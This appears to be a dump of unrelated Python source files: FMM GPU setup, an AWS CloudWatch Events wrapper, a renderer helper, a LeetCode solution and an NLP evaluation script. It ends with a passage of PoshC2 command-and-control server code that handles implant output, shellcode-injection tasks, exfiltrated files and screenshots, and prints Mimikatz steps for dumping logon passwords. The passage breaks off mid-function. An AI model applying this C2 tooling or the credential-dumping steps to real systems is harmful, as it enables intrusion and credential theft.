self.collect_gpu_ops()
self.setup_output_sizes()
self.params_to_gpu()
self.tree_to_gpu(obs_m, src_m)
self.interactions_to_gpu()
self.d2e_u2e_ops_to_gpu()
def setup_interactions(self):
self.interactions = self.cfg.traversal_module.fmmmm_interactions(
self.obs_tree, self.src_tree, self.cfg.inner_r, self.cfg.outer_r,
self.cfg.order, self.cfg.treecode
)
def collect_gpu_ops(self):
self.gpu_ops = dict()
for a in ['s', 'p']:
for b in ['s', 'p']:
name = a + '2' + b
self.gpu_ops[name] = getattr(self.cfg.gpu_module, name + '_' + self.cfg.K.name)
self.gpu_ops['c2e1'] = self.cfg.gpu_module.c2e_kernel1
self.gpu_ops['c2e2'] = self.cfg.gpu_module.c2e_kernel2
def setup_output_sizes(self):
self.n_surf_tris = self.cfg.surf[1].shape[0]
self.n_surf_dofs = self.n_surf_tris * 9
self.n_multipoles = self.n_surf_dofs * self.src_tree.n_nodes
self.n_locals = self.n_surf_dofs * self.obs_tree.n_nodes
self.n_input = self.src_m[1].shape[0] * 9
self.n_output = self.obs_m[1].shape[0] * 9
def float_gpu(self, arr):
return gpu.to_gpu(arr, self.cfg.float_type)
def int_gpu(self, arr):
return gpu.to_gpu(arr, np.int32)
def params_to_gpu(self):
self.gpu_data['params'] = self.float_gpu(self.cfg.params)
def tree_to_gpu(self, obs_m, src_m):
gd = self.gpu_data
gd['obs_pts'] = self.float_gpu(obs_m[0])
gd['obs_tris'] = self.int_gpu(obs_m[1][self.obs_tree.orig_idxs])
gd['src_pts'] = self.float_gpu(src_m[0])
gd['src_tris'] = self.int_gpu(src_m[1][self.src_tree.orig_idxs])
obs_tree_nodes = self.obs_tree.nodes
src_tree_nodes = self.src_tree.nodes
for name, tree in [('src', self.src_tree), ('obs', self.obs_tree)]:
gd[name + '_n_C'] = self.float_gpu(tree.node_centers)
gd[name + '_n_R'] = self.float_gpu(tree.node_Rs)
for name, tree in [('src', src_tree_nodes), ('obs', obs_tree_nodes)]:
gd[name + '_n_start'] = self.int_gpu(np.array([n.start for n in tree]))
gd[name + '_n_end'] = self.int_gpu(np.array([n.end for n in tree]))
def interactions_to_gpu(self):
op_names = ['p2p', 'p2m', 'p2l', 'm2p', 'm2m', 'm2l', 'l2p', 'l2l']
for name in op_names:
op = getattr(self.interactions, name)
if type(op) is list:
for i, op_level in enumerate(op):
self.op_to_gpu(name + str(i), op_level)
else:
self.op_to_gpu(name, op)
def op_to_gpu(self, name, op):
for data_name in ['obs_n_idxs', 'obs_src_starts', 'src_n_idxs']:
self.gpu_data[name + '_' + data_name] = self.int_gpu(
np.array(getattr(op, data_name), copy = False)
)
def d2e_u2e_ops_to_gpu(self):
gd = self.gpu_data
gd['u2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.u2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.m2m))
]
gd['d2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.d2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.l2l))
]
u2e_UT, u2e_E, u2e_V = build_c2e(
self.src_tree, self.cfg.outer_r, self.cfg.inner_r, self.cfg
)
gd['u2e_V'] = self.float_gpu(u2e_V)
gd['u2e_E'] = self.float_gpu(u2e_E)
gd['u2e_UT'] = self.float_gpu(u2e_UT)
d2e_UT, d2e_E, d2e_V = build_c2e(
self.obs_tree, self.cfg.inner_r, self.cfg.outer_r, self.cfg
)
gd['d2e_V'] = self.float_gpu(d2e_V)
gd['d2e_E'] = self.float_gpu(d2e_E)
gd['d2e_UT'] = self.float_gpu(d2e_UT)
def to_tree(self, input_orig):
orig_idxs = np.array(self.src_tree.orig_idxs)
input_orig = input_orig.reshape((-1,9))
return input_orig[orig_idxs,:].flatten()
def to_orig(self, output_tree):
orig_idxs = np.array(self.obs_tree.orig_idxs)
output_tree = output_tree.reshape((-1, 9))
output_orig = np.empty_like(output_tree)
output_orig[orig_idxs,:] = output_tree
return output_orig.flatten()
def report_interactions(fmm_obj):
dim = fmm_obj.obs_m[1].shape[1]
order = fmm_obj.cfg.surf[1].shape[0]
def count_interactions(op_name, op):
obs_surf = False if op_name[2] == 'p' else True
src_surf = False if op_name[0] == 'p' else True
return fmm_obj.cfg.traversal_module.count_interactions(
op, fmm_obj.obs_tree, fmm_obj.src_tree,
obs_surf, src_surf, order
)
n_obs_tris = fmm_obj.obs_m[1].shape[0]
n_src_tris = fmm_obj.src_m[1].shape[0]
level_ops = ['m2m', 'l2l']
ops = ['p2m', 'p2l', 'm2l', 'p2p', 'm2p', 'l2p']
interactions = dict()
for op_name in ops:
op = getattr(fmm_obj.interactions, op_name)
interactions[op_name] = count_interactions(op_name, op)
for op_name in level_ops:
ops = getattr(fmm_obj.interactions, op_name)
for op in ops:
if op_name not in interactions:
interactions[op_name] = 0
interactions[op_name] += count_interactions(op_name, op)
direct_i = n_obs_tris * n_src_tris
fmm_i = sum([v for k,v in interactions.items()])
logger.info('compression factor: ' + str(fmm_i / direct_i))
logger.info('# obs tris: ' + str(n_obs_tris))
logger.info('# src tris: ' + str(n_src_tris))
logger.info('total tree interactions: %e' % fmm_i)
for k, v in interactions.items():
logger.info('total %s interactions: %e' % (k, v))
|
16922
|
import boto3
from django.conf import settings
from backend.models import CloudWatchEvent
import json
class Events:
def __init__(self):
self.client = boto3.client('events', region_name=settings.NARUKO_REGION)
def list_rules(self):
response = []
for rules in self._list_rules():
response.extend(rules)
return response
def _list_rules(self):
# 最初はTokenなし
response = self.client.list_rules(NamePrefix='NARUKO-')
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
# Tokenがあれば次ページを返す
while token:
response = self.client.list_rules(
NamePrefix='NARUKO-',
NextToken=token
)
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
@staticmethod
def _build_cloudwatchevent(rules: dict):
cloudwatchevents = []
for rule in rules:
cloudwatchevents.append(CloudWatchEvent(
name=rule["Name"],
schedule_expression=rule.get("ScheduleExpression"),
is_active=rule["State"] == "ENABLED"
))
return cloudwatchevents
def save_event(self, event):
# ルール作成
self.client.put_rule(
Name=event.cloudwatchevent.name,
ScheduleExpression=event.cloudwatchevent.schedule_expression,
State="ENABLED" if event.cloudwatchevent.is_active else "DISABLED"
)
# ターゲット作成
target = dict(
Id=event.cloudwatchevent.name,
Arn=settings.EVENT_SNS_TOPIC_ARN,
Input=json.dumps(dict(id=event.event_model.id))
)
self.client.put_targets(
Rule=event.cloudwatchevent.name,
Targets=[target]
)
return event
def delete_event(self, event_name):
# ターゲット削除
self.client.remove_targets(
Rule=event_name,
Ids=[event_name]
)
# ルール削除
self.client.delete_rule(
Name=event_name
)
def describe_event(self, event_name):
response = self.client.describe_rule(
Name=event_name
)
return CloudWatchEvent(
name=response["Name"],
schedule_expression=response["ScheduleExpression"],
is_active=response["State"] == "ENABLED"
)
|
16937
|
import os
import subprocess
import threading
mutex = threading.Lock()
def render_appleseed(target_file, base_color_tex, normal_tex, roughness_tex, metallic_tex, resolution, appleseed_path):
mutex.acquire()
try:
# Read the template file from disk.
with open("scene_template.appleseed", "r") as file:
project_text = file.read()
# Substitute variables by their values.
project_text = project_text.replace("$baseColorTexturePath", base_color_tex)
project_text = project_text.replace("$normalTexturePath", normal_tex)
project_text = project_text.replace("$roughnessTexturePath", roughness_tex)
project_text = project_text.replace("$metallicTexturePath", metallic_tex)
project_text = project_text.replace("$frameWidth", str(resolution[0]))
project_text = project_text.replace("$frameHeight", str(resolution[1]))
# Write the new project file to disk.
project_file = os.path.splitext(target_file)[0] + ".appleseed"
with open(project_file, "w") as file:
file.write(project_text)
# Invoke appleseed to render the project file.
appleseed_cli_path = os.path.join(appleseed_path, "bin", "appleseed.cli.exe" if os.name == "nt" else "appleseed.cli")
subprocess.check_call([appleseed_cli_path, "--message-verbosity", "error", project_file, "--output", target_file])
except Exception as e:
print("Failed to generate {0} with appleseed: {1}".format(target_file, e))
raise
finally:
mutex.release()
|
16941
|
from .problem import ContingentProblem as Problem
from .. action import Action
from .sensor import Sensor
from . import errors
|
16947
|
class Solution(object):
def reverseVowels(self, s):
"""
:type s: str
:rtype: str
"""
vowels = set("aeiouAEIOU")
s = list(s)
i = 0
j = len(s) - 1
while i < j:
while i < j and s[i] not in vowels:
i += 1
while i < j and s[j] not in vowels:
j -= 1
if i < j:
s[i], s[j] = s[j], s[i]
i += 1
j -= 1
return ''.join(s)
|
16988
|
import os
import argparse
import subprocess
import random
import edlib
from typing import List
from collections import Counter
import stanza
class ExtractMetric(object):
"""used for precision recall"""
def __init__(self, nume=0, denom_p=0, denom_r=0, precision=0, recall=0, f1=0):
super(ExtractMetric, self).__init__()
self.nume = nume
self.denom_p = denom_p
self.denom_r = denom_r
self.precision = precision
self.recall = recall
self.f1 = f1
def read_file(fname, len_cut):
res1, res2 = [], []
with open(fname) as fin:
for line in fin:
x, y = line.rstrip().split('\t')
if len(x.split()) > len_cut or len(y.split()) > len_cut:
continue
res1.append(x)
res2.append(y)
return res1, res2
def write_file(fname: str, data: List[str]):
with open(fname, 'w') as fout:
for sent in data:
if isinstance(sent, list):
fout.write('{}\n'.format(' '.join(sent)))
else:
fout.write('{}\n'.format(sent))
def eval_edit(prototype, example):
def flat_cigar(cigar):
"""flatten the result path returned by edlib.align
"""
r = []
pointer = 0
while pointer < len(cigar):
num = []
while cigar[pointer].isdigit():
num.append(cigar[pointer])
pointer += 1
num = int(''.join(num))
r.extend([cigar[pointer]] * num)
pointer += 1
return r
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
edit_operation = edlib.align(e_text, p_text, task='path')
edit_operation = flat_cigar(edit_operation['cigar'])
new_p_text = []
new_e_text = []
new_p_pos = []
new_e_pos = []
src_cur = tgt_cur = 0
for edit in edit_operation:
if edit == '=' or edit == 'X':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
src_cur += 1
tgt_cur += 1
elif edit == 'I':
new_p_text.append(-1)
new_p_pos.append(-1)
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
tgt_cur += 1
elif edit == 'D':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(-1)
new_e_pos.append(-1)
src_cur += 1
else:
raise ValueError('{} edit operation is invalid!'.format(edit))
for i, edit in enumerate(edit_operation):
if edit not in res:
res[edit] = Counter()
if edit == '=':
res[edit]['{}={}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'X':
res[edit]['{}->{}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'I':
res[edit]['+{}'.format(new_e_pos[i])] += 1
elif edit == 'D':
res[edit]['-{}'.format(new_p_pos[i])] += 1
else:
raise ValueError
return res
def eval_f1(prototype, example):
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
e_word_counter = Counter(e_text)
for word, pos in zip(p_text, p_pos):
if pos not in res:
res[pos] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[pos].denom_r += 1
if e_word_counter[word] > 0:
e_word_counter[word] -= 1
res[pos].nume += 1
e_pos_counter = Counter(e_pos)
for k, v in e_pos_counter.items():
if k not in res:
res[k] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[k].denom_p += v
for k, v in res.items():
if res[k].denom_p != 0 and res[k].denom_r != 0 and res[k].nume != 0:
res[k].precision = res[k].nume / res[k].denom_p
res[k].recall = res[k].nume / res[k].denom_r
res[k].f1 = 2 * res[k].precision * res[k].recall / (res[k].precision + res[k].recall)
return res
def sentence_bleu(ref_path, hypo_path):
sent_bleu = subprocess.getoutput(
"fairseq-score --ref {} --sys {} --sentence-bleu".format(ref_path, hypo_path))
bleu_list = [float(line.split()[3].rstrip(',')) for line in sent_bleu.split('\n')[1:]]
return sum(bleu_list) / len(bleu_list)
def generate_rand_prototype(exp_dir, num):
dataset_to_template = {
"coco40k": "support_prototype/datasets/coco/coco.template.40k.txt",
"yelp": "support_prototype/datasets/yelp_data/yelp.template.50k.lower.txt",
"yelp_large": "support_prototype/datasets/yelp_large_data/yelp_large.template.100k.txt",
}
def parse_exp_dir(name):
dataset = name.rstrip('/').split('/')[-1].split('_')[0]
return dataset
dataset = parse_exp_dir(exp_dir)
return subprocess.getoutput(
"shuf -n {} {}".format(num, dataset_to_template[dataset])).split('\n')
parser = argparse.ArgumentParser(description='Evaluate analysis metrics')
parser.add_argument('--prefix', type=str, choices=['inference', 'generation'],
help='prediction file prefix')
parser.add_argument('--exp-dir', type=str, help='output directory')
args = parser.parse_args()
fout = open(os.path.join(args.exp_dir, 'analysis_{}_res.txt'.format(args.prefix)), 'w')
len_cut = 1000
prototypes, examples = read_file(os.path.join(args.exp_dir, '{}_analysis_input.txt'.format(args.prefix)), len_cut=len_cut)
prototype_path = os.path.join(args.exp_dir, 'prototype.txt')
prototype_pos_path = os.path.join(args.exp_dir, 'prototype_pos.txt')
prototype_rand_path = os.path.join(args.exp_dir, 'prototype_rand.txt')
prototype_pos_rand_path = os.path.join(args.exp_dir, 'prototype_pos_rand.txt')
example_path = os.path.join(args.exp_dir, 'example.txt')
example_pos_path = os.path.join(args.exp_dir, 'example_pos.txt')
prototypes_rand = generate_rand_prototype(args.exp_dir, len(examples))
write_file(prototype_path, prototypes)
write_file(example_path, examples)
write_file(prototype_rand_path, prototypes_rand)
# surface BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_rand_path))
bleu = sentence_bleu(prototype_rand_path, example_path)
print('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_path))
bleu = sentence_bleu(prototype_path, example_path)
print('Regular BLEU: \n{}'.format(bleu))
fout.write('Regular BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# POS tagging
print('POS tagging')
nlp = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos', tokenize_pretokenized=True)
prototype_doc = nlp('\n'.join(prototypes))
example_doc = nlp('\n'.join(examples))
prototype_rand_doc = nlp('\n'.join(prototypes_rand))
prototypes_pos = [[word.upos for word in sent.words] for sent in prototype_doc.sentences]
examples_pos = [[word.upos for word in sent.words] for sent in example_doc.sentences]
prototypes_pos_rand = [[word.upos for word in sent.words]for sent in prototype_rand_doc.sentences]
write_file(prototype_pos_path, prototypes_pos)
write_file(example_pos_path, examples_pos)
write_file(prototype_pos_rand_path, prototypes_pos_rand)
# POS BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_rand_path))
bleu = sentence_bleu(prototype_pos_rand_path, example_pos_path)
print('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_path))
bleu = sentence_bleu(prototype_pos_path, example_pos_path)
print('POS BLEU: \n{}'.format(bleu))
fout.write('POS BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# break down precision and recall
print("compute precision, recall, f1")
assert len(prototypes) == len(prototypes_pos)
assert len(examples) == len(examples_pos)
res = eval_f1(list(prototype_rand_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('random baseline precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
res = eval_f1(list(prototype_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
# edit operations
print("edit analysis")
res = eval_edit(list(prototype_doc.sentences), list(example_doc.sentences))
total = sum([sum(v.values()) for k, v in res.items()])
fout.write('total: {}\n'.format(total))
res = sorted(res.items(), key=lambda item: (-sum(item[1].values())))
for k, v in res:
fout.write('{}: {}\n'.format(k, sum(v.values())))
for k1, v1 in v.most_common():
fout.write('{}: {} ({:.3f}), '.format(k1, v1, v1 / sum(v.values())))
fout.write('\n\n')
fout.close()
|
17027
|
import datetime, hashlib, base64, traceback, os, re
import poshc2.server.database.DB as DB
from poshc2.Colours import Colours
from poshc2.server.Config import ModulesDirectory, DownloadsDirectory, ReportsDirectory
from poshc2.server.Implant import Implant
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import translate_power_status
from poshc2.Utils import randomuri
def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
now = datetime.datetime.now()
all_implants = DB.get_implants_all()
if not all_implants:
print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
return
for implant in all_implants:
implantID = implant.ImplantID
RandomURI = implant.RandomURI
Hostname = implant.Hostname
encKey = implant.Key
Domain = implant.Domain
User = implant.User
implant_type = implant.Pivot
if RandomURI in uriPath and cookieVal:
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
if implant_type == "JXA":
rawoutput = decrypt(encKey, post_data[1500:])
else:
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
cookieMsg = ""
if "-" in decCookie:
decCookie = decCookie.strip('\x00')
splt = decCookie.split("-")
if not splt[0].isdigit():
print(Colours.RED + "[!] Cookie %s is invalid" % decCookie + Colours.GREEN)
return
else:
taskId = str(int(splt[0]))
cookieMsg = splt[1]
else:
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if taskId != "99999":
executedCmd = DB.get_cmd_from_task_id(taskId)
task_owner = DB.get_task_owner(taskId)
else:
print(Colours.END)
timenow = now.strftime("%Y-%m-%d %H:%M:%S")
print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)" % ReportsDirectory)
print(Colours.GREEN)
print(rawoutput)
miscData = open(("%sbackground-data.txt" % ReportsDirectory), "a+")
miscData.write(rawoutput)
return
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if cookieMsg is not None and cookieMsg.lower().startswith("pwrstatusmsg"):
translate_power_status(outputParsed, RandomURI)
return
if "loadmodule" in executedCmd and len(outputParsed.split()) == 0:
print("Module loaded successfully")
DB.update_task(taskId, "Module loaded successfully")
elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed:
outputParsed = re.search("PBind-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("PBind-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
PivotString = "C# PBind"
if "pbind-command run-exe PBind PBind start" in executedCmd:
PivotString = "C# PBind Pivot"
newImplant = Implant(implantID, PivotString, str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
if "pbind-command run-exe PBind PBind start" in executedCmd:
DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
else:
DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
outputParsed = re.search("FComm-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif executedCmd.lower().startswith("beacon "):
new_sleep = executedCmd.replace('beacon ', '').strip()
DB.update_sleep(new_sleep, RandomURI)
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = implant.User + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
DB.update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
DB.update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
DB.update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
DB.update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
counter = 1
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter - 2)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
DB.update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
DB.update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
DB.update_task(taskId, rawoutput)
print(rawoutput)
else:
dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
dumppath = "%s%s" % (DownloadsDirectory, dumpname)
open(dumppath, 'w').write(rawoutput)
message = "Dump written to: %s" % dumppath
message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"
message = message + "\n $filename = '.\\%s'" % dumpname
message = message + "\n $b64 = Get-Content $filename"
message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"
message = message + "\n ./mimikatz.exe"
message = message + "\n sekurlsa::minidump safetydump.dmp"
message = message + "\n sekurlsa::logonpasswords"
message = message + "\nOr to just decode on Linux:"
message = message + f"\n base64 -id {dumpname} > dump.bin"
DB.update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
DB.update_task(taskId, outputParsed)
process_mimikatz(outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
DB.update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
def newTask(path):
all_implants = DB.get_implants_all()
commands = ""
if all_implants:
for i in all_implants:
RandomURI = i.RandomURI
Pivot = i.Pivot
EncKey = i.Key
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for task in tasks:
command = task[2]
user = task[3]
user_command = command
implant = DB.get_implantbyrandomuri(RandomURI)
implant_type = DB.get_implanttype(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith("run-jxa ")) or (command.lower().startswith("clipboard-monitor ")) or (command.lower().startswith("cred-popper ")):
user_command = command[:command.index("#")]
command = "run-jxa " + command[command.index("#") + 1:]
elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')):
PBind = False
FComm = False
if command.lower().startswith('pbind-command upload-file'):
PBind = True
if command.lower().startswith('fcomm-command upload-file'):
FComm = True
upload_args = command \
.replace('pbind-command upload-file', '') \
.replace('fcomm-command upload-file', '') \
.replace('upload-file', '')
upload_file_args_split = upload_args.split()
if len(upload_file_args_split) < 2:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
continue
upload_file = upload_file_args_split[0]
upload_file_destination = upload_file_args_split[1]
upload_args = upload_args.replace(upload_file, '')
upload_args = upload_args.replace(upload_file_destination, '')
with open(upload_file, "rb") as f:
upload_file_bytes = f.read()
if not upload_file_bytes:
print(Colours.RED + f"Error, no bytes read from the upload file, removing task: {upload_file}" + Colours.GREEN)
DB.del_newtasks(str(task[0]))
continue
upload_file_bytes_b64 = base64.b64encode(upload_file_bytes).decode("utf-8")
if implant_type.lower().startswith('c#'):
command = f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"
elif implant_type.lower().startswith('ps'):
command = f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('py'):
command = f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('jxa'):
command = f"upload-file {upload_file_destination}:{upload_file_bytes_b64} {upload_args}"
else:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
if PBind:
command = f"pbind-command {command}"
if FComm:
command = f"fcomm-command {command}"
filehash = hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest()
user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"
taskId = DB.insert_task(RandomURI, user_command, user)
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if len(str(taskId)) > 5:
raise ValueError('Task ID is greater than 5 characters which is not supported.')
print(Colours.YELLOW)
if user is not None and user != "":
print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, user, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
